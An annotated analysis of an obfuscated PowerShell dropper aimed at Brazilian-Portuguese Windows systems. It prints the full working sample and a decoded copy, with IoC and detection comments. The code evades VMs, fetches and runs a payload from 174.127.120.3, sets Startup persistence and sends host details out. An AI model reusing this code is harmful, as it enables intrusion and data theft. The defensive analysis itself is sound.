ps1 threat
# Random-name generator: returns a 6-9 character string drawn from an embedded
# alphabet. The callers below use it to name the dropped .zip and the
# Startup-folder .lnk, so on-disk names vary per run and cannot be matched
# statically; match on location and extension instead.
# Identifiers in this sample are obfuscated (built only from '/', '\', '=', '_'),
# and every string literal is Base64 of UTF-16LE text. The trailing "| |" on
# each line is residue of the gist's table rendering, not PowerShell.
function _/=\_____/==\/=\/\ | |
{ | |
try | |
{ | |
# Loop bound: Get-Random's -Maximum is exclusive, so this yields 5..8.
${/=======\/=\_/\/=} = Get-Random -Minimum 5 -Maximum 9 | |
${/=====\_/\/\_/\_/} = "" | |
# Counter runs 0..bound inclusive, i.e. 6 to 9 iterations.
For (${_____/=\_/==\_/\/}=0; ${_____/=\_/==\_/\/} -le ${/=======\/=\_/\/=}; ${_____/=\_/==\_/\/}++) | |
{ | |
# Decodes to the alphabet 'qwertyuioplkjhgfdsazxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'
# (see the decoded listing further down the page). Re-decoded on every iteration.
${/=\__/==\/\/====\} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cQB3AGUAcgB0AHkAdQBpAG8AcABsAGsAagBoAGcAZgBkAHMAYQB6AHgAYwB2AGIAbgBtAFEAVwBFAFIAVABZAFUASQBPAFAAQQBTAEQARgBHAEgASgBLAEwAWgBYAEMAVgBCAE4ATQA='))) | |
# Index is 1..Length-1, so the alphabet's first character ('q') is never chosen.
${/===\/\_/====\_/=} = Get-Random -Minimum 1 -Maximum ${/=\__/==\/\/====\}.Length | |
${/=\________/=\__/} = ${/=\__/==\/\/====\}.Substring(${/===\/\_/====\_/=},1) | |
${/=====\_/\/\_/\_/} = ${/=====\_/\/\_/\_/}+${/=\________/=\__/} | |
} | |
return ${/=====\_/\/\_/\_/} | |
} | |
# Empty finally: there is no catch, so any exception propagates to the caller.
finally{} | |
} | |
# Attacker infrastructure and drop paths (Base64/UTF-16LE literals; values
# taken from the decoded listing further down the page).
# Staging directory for every dropped artifact: %LOCALAPPDATA%.
${/===\/\_/==\/=\__} = $env:LOCALAPPDATA | |
# Beacon endpoint: 'http://174.127.120.3/19/inf.php' + '?pc=' (query string is
# completed by the beacon function below). Network IoC: HTTP to 174.127.120.3.
${_____/=\/\_/==\_/} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwAxADcANAAuADEAMgA3AC4AMQAyADAALgAzAC8AMQA5AC8AaQBuAGYALgBwAGgAcAA='))) + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('PwBwAGMAPQA='))) | |
# Second-stage payload archive: 'http://174.127.120.3/19/1904.zip'.
${/=\/=\_/=\__/\/\_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwAxADcANAAuADEAMgA3AC4AMQAyADAALgAzAC8AMQA5AC8AMQA5ADAANAAuAHoAaQBwAA=='))) | |
# Expected executable inside the archive: %LOCALAPPDATA%\Firefox.exe
# (name chosen to masquerade as a browser). Host IoC: an executable with that
# name directly under %LOCALAPPDATA% rather than under a browser install dir.
${_/===\/\/\__/===\} = ${/===\/\_/==\/=\__} + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XABGAGkAcgBlAGYAbwB4AC4AZQB4AGUA'))) | |
# Sandbox/VM evasion check. Reads the computer model via WMI and returns "Y"
# when it matches one of four hypervisor model strings (decoded values:
# 'VirtualBox', 'VMware Virtual Platform', 'Virtual Machine', 'HVM domU'),
# otherwise "N". The main block below only proceeds on "N". Analysis note:
# the check is a plain string equality on Win32_ComputerSystem.Model, so a
# sandbox reporting a different model string is not detected by it.
function ___________/===\__ | |
{ | |
${_/\/\___/=\_/===\} = gwmi -Class Win32_ComputerSystem |select -ExpandProperty Model | |
if (${_/\/\___/=\_/===\} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBpAHIAdAB1AGEAbABCAG8AeAA='))) -or | |
${_/\/\___/=\_/===\} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBNAHcAYQByAGUAIABWAGkAcgB0AHUAYQBsACAAUABsAGEAdABmAG8AcgBtAA=='))) -or | |
${_/\/\___/=\_/===\} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUA'))) -or | |
${_/\/\___/=\_/===\} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABWAE0AIABkAG8AbQBVAA==')))) | |
{ | |
return "Y" | |
} | |
else | |
{ | |
return "N" | |
} | |
} | |
# Locale gate: returns the OS MUILanguages array (installed UI languages).
# The main block compares it against 'pt-BR', so the dropper targets
# Brazilian-Portuguese systems only.
function ____________/===\_ | |
{ | |
${/\____/==\/==\/==} = gwmi -Class Win32_OperatingSystem | |
${/==\/\_/====\_/\/} = ${/\____/==\/==\/==}.MUILanguages | |
return ${/==\/\_/====\_/\/} | |
} | |
# Downloader: fetches a URL to a local file with System.Net.WebClient.
#   first parameter  - source URL (the payload .zip in the main block)
#   second parameter - destination path (under %LOCALAPPDATA%)
# Returns "Y" when DownloadFile completes; the finally block is empty and
# there is no catch, so a failed download throws out of this function.
# Detection: WebClient.DownloadFile from a powershell.exe process writing to
# %LOCALAPPDATA% is the observable behaviour here.
function __/\/=\/\/\_/\/\_/ | |
{ | |
Param([string]${________/\/=\/\___},[string]${_/==\___/====\___/}); | |
try | |
{ | |
${_/\_/\/\_/\/=\/==} = new-object System.Net.WebClient; | |
${_/\_/\/\_/\/=\/==}.DownloadFile(${________/\/=\/\___},${_/==\___/====\___/}); | |
return "Y" | |
}finally{} | |
} | |
# Installed-AV enumeration. Queries WMI namespace 'root\SecurityCenter2' with
# 'SELECT * FROM AntiVirusProduct' (decoded values) and returns the
# displayName property, which the beacon below exfiltrates as the 'av' field.
# The two declared parameters are never used; the only caller passes no
# arguments, so the @psboundparameters splat onto gwmi is empty.
# Detection: a WMI query against root\SecurityCenter2 from a script host is a
# common reconnaissance step and is a useful telemetry event on its own.
function _/====\_/=\/=\/\/\ { | |
[cmdletBinding()] | |
param ( | |
# Default reads an environment variable with the same obfuscated name;
# presumably never set on the victim - looks like generated filler.
[string]${___/======\__/==\/} = "${env:___/======\__/==\/}" , | |
${_/=\___/===\/\__/=} | |
) | |
BEGIN | |
{ | |
# WQL query text: 'SELECT * FROM AntiVirusProduct'.
${/=\/=\/=\/\______} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBFAEwARQBDAFQAIAAqACAARgBSAE8ATQAgAEEAbgB0AGkAVgBpAHIAdQBzAFAAcgBvAGQAdQBjAHQA'))) | |
} | |
PROCESS | |
{ | |
# Namespace literal: 'root\SecurityCenter2'.
${/=\/\/\/=====\_/\} = gwmi -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cgBvAG8AdABcAFMAZQBjAHUAcgBpAHQAeQBDAGUAbgB0AGUAcgAyAA=='))) -Query ${/=\/=\/=\/\______} @psboundparameters | |
return ${/=\/\/\/=====\_/\}.displayName | |
} | |
END { | |
} | |
} | |
# Host fingerprint fields (each wrapped in parentheses) that the beacon
# function reports to the C2, plus the remaining file paths the dropper uses.
# OS caption, e.g. the Windows edition string.
${__/=\/=\/\_/=\_/=} = "("+(gwmi -class Win32_OperatingSystem).Caption+")" | |
# Computer name.
${/=\/\_/===\_/==\_} = "("+(gwmi -Class Win32_ComputerSystem -Property Name).Name + ")" | |
# Current user name.
${_/\/\/=\_/=\/====} = "("+[Environment]::UserName+ ")" | |
# Installed AV product name(s), from the SecurityCenter2 query above.
${/===\_______/\___} = "("+(_/====\_/=\/=\/\/\)+ ")" | |
# '64 Bits? ' followed by the 64-bit OS flag.
${_/=\/\/==\_/\/==\} = "("+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('NgA0ACAAQgBpAHQAcwA/ACAA'))) + [Environment]::Is64BitOperatingSystem+ ")" | |
# Infection marker: %LOCALAPPDATA%\Chrome.xml. Its existence short-circuits
# the whole dropper, so this file is a reliable host IoC for this sample.
${_/=\_/=\/\/\/\/=\} = $env:LOCALAPPDATA + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XABDAGgAcgBvAG0AZQAuAHgAbQBsAA=='))) | |
# Download target: %LOCALAPPDATA%\<random 6-9 letters>.zip
${/====\__/=\_/==\/} = ${/===\/\_/==\/=\__} +"\"+ (_/=\_____/==\/=\/\) + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgB6AGkAcAA='))) | |
# Persistence: <user Startup folder>\<random 6-9 letters>.lnk
# (GetFolderPath('Startup')). Note the random name is generated again here,
# so it differs from the .zip name.
${___/\/\_/\/==\__/} = [Environment]::GetFolderPath($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AGEAcgB0AHUAcAA=')))) +"\"+ (_/=\_____/==\/=\/\) + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgBsAG4AawA='))) | |
# Writes the empty infection marker file (%LOCALAPPDATA%\Chrome.xml).
# Called first in the main block, before the download, so the marker exists
# even if a later step fails.
function __/==\__/\/====\__ | |
{ | |
ni -ItemType file -Path ${_/=\_/=\/\/\/\/=\} | |
} | |
# Check-in beacon. Performs an HTTP GET (DownloadString, response discarded)
# to the inf.php endpoint. The Base64 literal decodes to a template of
# variable references (see the decoded listing below) that ExpandString fills
# at run time, producing: inf.php?pc=(host)&os=(caption)&user=(user)&av=(av).
# Detection: a GET to /19/inf.php whose query string carries hostname, OS,
# username and AV product name in parentheses.
function ___/===\/\_/\__/\/ | |
{ | |
${__/====\____/\_/=} = New-Object system.Net.WebClient; | |
${__/====\____/\_/=}.downloadString($ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AF8AXwBfAF8AXwAvAD0AXAAvAFwAXwAvAD0APQBcAF8ALwB9ACQAewAvAD0AXAAvAFwAXwAvAD0APQA9AFwAXwAvAD0APQBcAF8AfQAmAG8AcwA9ACQAewBfAF8ALwA9AFwALwA9AFwALwBcAF8ALwA9AFwAXwAvAD0AfQAmAHUAcwBlAHIAPQAkAHsAXwAvAFwALwBcAC8APQBcAF8ALwA9AFwALwA9AD0APQA9AH0AJgBhAHYAPQAkAHsALwA9AD0APQBcAF8AXwBfAF8AXwBfAF8ALwBcAF8AXwBfAH0A')))) | |
} | |
# Creates the staging directory, which is %LOCALAPPDATA% itself. On a normal
# profile that directory already exists, so New-Item presumably reports an
# error here and execution continues - TODO confirm against a live trace.
function _/==\_/==\_/\/\/\_ | |
{ | |
ni -ItemType Directory -Path ${/===\/\_/==\/=\__} | |
} | |
# Archive extraction without Expand-Archive: uses the Shell.Application COM
# object to enumerate the zip's items and copy each into the destination.
#   first parameter  - path of the .zip
#   second parameter - destination folder (%LOCALAPPDATA% in the main block)
# Detection: Shell.Application CoCreate from powershell.exe followed by file
# writes under %LOCALAPPDATA% is the observable sequence.
function ___/\___/===\/\/==(${____/==\__/\/==\_/}, ${_/=\___/\/\/\_/==\}) | |
{ | |
${__/\_/\___/=\___/} = new-object -com shell.application | |
${____/==\_/===\/==} = ${__/\_/\___/=\___/}.NameSpace(${____/==\__/\/==\_/}) | |
foreach(${__/===\__/\/\_/=\} in ${____/==\_/===\/==}.items()) | |
{ | |
${__/\_/\___/=\___/}.Namespace(${_/=\___/\/\/\_/==\}).copyhere(${__/===\__/\/\_/=\}) | |
} | |
} | |
# Persistence: creates a .lnk in the user's Startup folder via WScript.Shell.
#   first parameter  - .lnk path (Startup\<random>.lnk in the main block)
#   second parameter - shortcut target (%LOCALAPPDATA%\Firefox.exe)
# TargetPath is set through ExpandString on a template that decodes to the
# second parameter's variable reference; IconLocation decodes to
# '%SystemRoot%\system32\SHELL32.dll, 41' (a generic shell icon).
# Empty finally, no catch: errors propagate. Detection: .lnk creation in the
# Startup folder whose target is an executable under %LOCALAPPDATA%.
function _/==\_______/=\/== | |
{ | |
Param([string]${_/\___________/===},[string]${__/====\___/\/=\_/}); | |
try{ | |
# COM ProgID literal: 'WScript.Shell'.
${/=\_/\_/\_/==\__/} = New-Object -com $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAA='))) | |
${__/\_/\/=\/=\____} = ${/=\_/\_/\_/==\__/}.CreateShortcut(${_/\___________/===}) | |
${__/\_/\/=\/=\____}.TargetPath = $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AF8AXwAvAD0APQA9AD0AXABfAF8AXwAvAFwALwA9AFwAXwAvAH0A'))) | |
${__/\_/\/=\/=\____}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXABzAHkAcwB0AGUAbQAzADIAXABTAEgARQBMAEwAMwAyAC4AZABsAGwALAAgADQAMQA='))) | |
${__/\_/\/=\/=\____}.Save() | |
}finally{} | |
} | |
# Entry logic. Runs only when the marker file does not exist, the OS UI
# language list contains 'pt-BR' (decoded value) and the VM check returned "N".
# Because MUILanguages is an array, '-eq' acts as a filter on the left operand,
# so the first condition is true whenever pt-BR is among the installed
# languages rather than only when it is the sole one.
if (([System.IO.File]::Exists(${_/=\_/=\/\/\/\/=\}))) | |
{ | |
# Marker present: already ran on this host, do nothing.
} | |
else | |
{ | |
if ((____________/===\_) -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cAB0AC0AQgBSAA=='))) -and (___________/===\__) -eq "N") | |
{ | |
# 1. write marker %LOCALAPPDATA%\Chrome.xml
__/==\__/\/====\__ | |
# 2. ensure staging directory
_/==\_/==\_/\/\/\_ | |
# 3. download 1904.zip to %LOCALAPPDATA%\<random>.zip
__/\/=\/\/\_/\/\_/ -________/\/=\/\___ ${/=\/=\_/=\__/\/\_} -_/==\___/====\___/ ${/====\__/=\_/==\/} | |
# 4. extract the archive into %LOCALAPPDATA%
___/\___/===\/\/== ${/====\__/=\_/==\/} ${/===\/\_/==\/=\__} | |
# 5. Startup-folder .lnk pointing at %LOCALAPPDATA%\Firefox.exe
_/==\_______/=\/== -_/\___________/=== ${___/\/\_/\/==\__/} -__/====\___/\/=\_/ ${_/===\/\/\__/===\} | |
# 6. launch the extracted executable
start-process ${_/===\/\/\__/===\} | |
# 7. report host fingerprint to the C2
___/===\/\_/\__/\/ | |
} | |
} | |
## decodes to (Base64/UTF-16LE literals replaced with their plaintext; the `$('...'))` form keeps one closing parenthesis too many from the replaced `GetString(FromBase64String(` call, so this listing is for reading, not for running):
# Decoded rendering of the random-name generator: a 6-9 character string from
# the embedded alphabet, used to name the dropped .zip and Startup .lnk.
# The "$('...'))" form carries an extra ')' left over from removing the
# Base64 decode call, so this block is not syntactically valid as written.
function _/=\_____/==\/=\/\ | |
{ | |
try | |
{ | |
# -Maximum is exclusive: bound is 5..8, loop runs bound+1 times.
${/=======\/=\_/\/=} = Get-Random -Minimum 5 -Maximum 9 | |
${/=====\_/\/\_/\_/} = "" | |
For (${_____/=\_/==\_/\/}=0; ${_____/=\_/==\_/\/} -le ${/=======\/=\_/\/=}; ${_____/=\_/==\_/\/}++) | |
{ | |
${/=\__/==\/\/====\} = $('qwertyuioplkjhgfdsazxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM')) | |
# Index 1..Length-1: the leading 'q' is never selected.
${/===\/\_/====\_/=} = Get-Random -Minimum 1 -Maximum ${/=\__/==\/\/====\}.Length | |
${/=\________/=\__/} = ${/=\__/==\/\/====\}.Substring(${/===\/\_/====\_/=},1) | |
${/=====\_/\/\_/\_/} = ${/=====\_/\/\_/\_/}+${/=\________/=\__/} | |
} | |
return ${/=====\_/\/\_/\_/} | |
} | |
# No catch: exceptions propagate.
finally{} | |
} | |
# Decoded infrastructure strings. Network IoC: 174.127.120.3 (beacon and
# payload host). Host IoC: %LOCALAPPDATA%\Firefox.exe.
${/===\/\_/==\/=\__} = $env:LOCALAPPDATA | |
# Beacon base URL; '?pc=' starts the fingerprint query string.
${_____/=\/\_/==\_/} = $('http://174.127.120.3/19/inf.php')) + $('?pc=')) | |
# Second-stage archive.
${/=\/=\_/=\__/\/\_} = $('http://174.127.120.3/19/1904.zip')) | |
# Executable expected after extraction; masquerades as a browser binary.
${_/===\/\/\__/===\} = ${/===\/\_/==\/=\__} + $('\Firefox.exe')) | |
# Decoded VM check: "Y" if Win32_ComputerSystem.Model equals one of four
# hypervisor model strings, else "N". Plain equality only - other sandbox
# model strings pass as "N".
function ___________/===\__ | |
{ | |
${_/\/\___/=\_/===\} = gwmi -Class Win32_ComputerSystem |select -ExpandProperty Model | |
if (${_/\/\___/=\_/===\} -eq $('VirtualBox')) -or | |
${_/\/\___/=\_/===\} -eq $('VMware Virtual Platform')) -or | |
${_/\/\___/=\_/===\} -eq $('Virtual Machine')) -or | |
${_/\/\___/=\_/===\} -eq $('HVM domU'))) | |
{ | |
return "Y" | |
} | |
else | |
{ | |
return "N" | |
} | |
} | |
# Returns the OS MUILanguages array; the entry logic tests it for 'pt-BR'.
function ____________/===\_ | |
{ | |
${/\____/==\/==\/==} = gwmi -Class Win32_OperatingSystem | |
${/==\/\_/====\_/\/} = ${/\____/==\/==\/==}.MUILanguages | |
return ${/==\/\_/====\_/\/} | |
} | |
# Downloader (url, destination path) via WebClient.DownloadFile. Returns "Y"
# on completion; empty finally and no catch, so failures throw to the caller.
function __/\/=\/\/\_/\/\_/ | |
{ | |
Param([string]${________/\/=\/\___},[string]${_/==\___/====\___/}); | |
try | |
{ | |
${_/\_/\/\_/\/=\/==} = new-object System.Net.WebClient; | |
${_/\_/\/\_/\/=\/==}.DownloadFile(${________/\/=\/\___},${_/==\___/====\___/}); | |
return "Y" | |
}finally{} | |
} | |
# Decoded AV enumeration: WMI query 'SELECT * FROM AntiVirusProduct' in
# 'root\SecurityCenter2', returning displayName for the beacon's 'av' field.
# Declared parameters are unused; the only caller passes none, so the
# @psboundparameters splat is empty.
function _/====\_/=\/=\/\/\ { | |
[cmdletBinding()] | |
param ( | |
[string]${___/======\__/==\/} = "${env:___/======\__/==\/}" , | |
${_/=\___/===\/\__/=} | |
) | |
BEGIN | |
{ | |
${/=\/=\/=\/\______} = $('SELECT * FROM AntiVirusProduct')) | |
} | |
PROCESS | |
{ | |
${/=\/\/\/=====\_/\} = gwmi -Namespace $('root\SecurityCenter2')) -Query ${/=\/=\/=\/\______} @psboundparameters | |
return ${/=\/\/\/=====\_/\}.displayName | |
} | |
END { | |
} | |
} | |
# Decoded fingerprint fields and drop paths.
# OS caption.
${__/=\/=\/\_/=\_/=} = "("+(gwmi -class Win32_OperatingSystem).Caption+")" | |
# Computer name.
${/=\/\_/===\_/==\_} = "("+(gwmi -Class Win32_ComputerSystem -Property Name).Name + ")" | |
# User name.
${_/\/\/=\_/=\/====} = "("+[Environment]::UserName+ ")" | |
# Installed AV product name(s).
${/===\_______/\___} = "("+(_/====\_/=\/=\/\/\)+ ")" | |
# 64-bit flag.
${_/=\/\/==\_/\/==\} = "("+$('64 Bits? ')) + [Environment]::Is64BitOperatingSystem+ ")" | |
# Infection marker %LOCALAPPDATA%\Chrome.xml - reliable host IoC.
${_/=\_/=\/\/\/\/=\} = $env:LOCALAPPDATA + $('\Chrome.xml')) | |
# %LOCALAPPDATA%\<random>.zip
${/====\__/=\_/==\/} = ${/===\/\_/==\/=\__} +"\"+ (_/=\_____/==\/=\/\) + $('.zip')) | |
# <Startup folder>\<random>.lnk (random name drawn independently of the .zip name)
${___/\/\_/\/==\__/} = [Environment]::GetFolderPath($('Startup'))) +"\"+ (_/=\_____/==\/=\/\) + $('.lnk')) | |
# Creates the empty marker file (%LOCALAPPDATA%\Chrome.xml).
function __/==\__/\/====\__ | |
{ | |
ni -ItemType file -Path ${_/=\_/=\/\/\/\/=\} | |
} | |
# Decoded beacon: ExpandString fills the variable references in the single-
# quoted template at run time, giving
# inf.php?pc=(host)&os=(caption)&user=(user)&av=(av); the GET response is
# discarded. Detection: request to /19/inf.php with these query parameters.
function ___/===\/\_/\__/\/ | |
{ | |
${__/====\____/\_/=} = New-Object system.Net.WebClient; | |
${__/====\____/\_/=}.downloadString($ExecutionContext.InvokeCommand.ExpandString('${_____/=\/\_/==\_/}${/=\/\_/===\_/==\_}&os=${__/=\/=\/\_/=\_/=}&user=${_/\/\/=\_/=\/====}&av=${/===\_______/\___}'))) | |
} | |
# New-Item on %LOCALAPPDATA%; that directory normally already exists, so this
# presumably errors non-fatally and execution continues - TODO confirm.
function _/==\_/==\_/\/\/\_ | |
{ | |
ni -ItemType Directory -Path ${/===\/\_/==\/=\__} | |
} | |
# Zip extraction through the Shell.Application COM object: copies every item
# of the archive (first parameter) into the destination folder (second).
function ___/\___/===\/\/==(${____/==\__/\/==\_/}, ${_/=\___/\/\/\_/==\}) | |
{ | |
${__/\_/\___/=\___/} = new-object -com shell.application | |
${____/==\_/===\/==} = ${__/\_/\___/=\___/}.NameSpace(${____/==\__/\/==\_/}) | |
foreach(${__/===\__/\/\_/=\} in ${____/==\_/===\/==}.items()) | |
{ | |
${__/\_/\___/=\___/}.Namespace(${_/=\___/\/\/\_/==\}).copyhere(${__/===\__/\/\_/=\}) | |
} | |
} | |
# Decoded persistence: WScript.Shell shortcut at the first parameter's path
# (Startup\<random>.lnk) targeting the second parameter
# (%LOCALAPPDATA%\Firefox.exe), with a generic SHELL32.dll icon. No catch.
# Detection: Startup-folder .lnk whose target lives under %LOCALAPPDATA%.
function _/==\_______/=\/== | |
{ | |
Param([string]${_/\___________/===},[string]${__/====\___/\/=\_/}); | |
try{ | |
${/=\_/\_/\_/==\__/} = New-Object -com $('WScript.Shell')) | |
${__/\_/\/=\/=\____} = ${/=\_/\_/\_/==\__/}.CreateShortcut(${_/\___________/===}) | |
${__/\_/\/=\/=\____}.TargetPath = $ExecutionContext.InvokeCommand.ExpandString('${__/====\___/\/=\_/}')) | |
${__/\_/\/=\/=\____}.IconLocation = $('%SystemRoot%\system32\SHELL32.dll, 41')) | |
${__/\_/\/=\/=\____}.Save() | |
}finally{} | |
} | |
# Decoded entry logic: proceed only if no marker file, 'pt-BR' is among the
# installed UI languages (array -eq acts as a filter), and the VM check is "N".
if (([System.IO.File]::Exists(${_/=\_/=\/\/\/\/=\}))) | |
{ | |
# Already ran on this host.
} | |
else | |
{ | |
if ((____________/===\_) -eq $('pt-BR')) -and (___________/===\__) -eq "N") | |
{ | |
# marker -> directory -> download -> extract -> Startup .lnk -> launch -> beacon
__/==\__/\/====\__ | |
_/==\_/==\_/\/\/\_ | |
__/\/=\/\/\_/\/\_/ -________/\/=\/\___ ${/=\/=\_/=\__/\/\_} -_/==\___/====\___/ ${/====\__/=\_/==\/} | |
___/\___/===\/\/== ${/====\__/=\_/==\/} ${/===\/\_/==\/=\__} | |
_/==\_______/=\/== -_/\___________/=== ${___/\/\_/\/==\__/} -__/====\___/\/=\_/ ${_/===\/\/\__/===\} | |
start-process ${_/===\/\/\__/===\} | |
___/===\/\_/\__/\/ | |
} | |
} |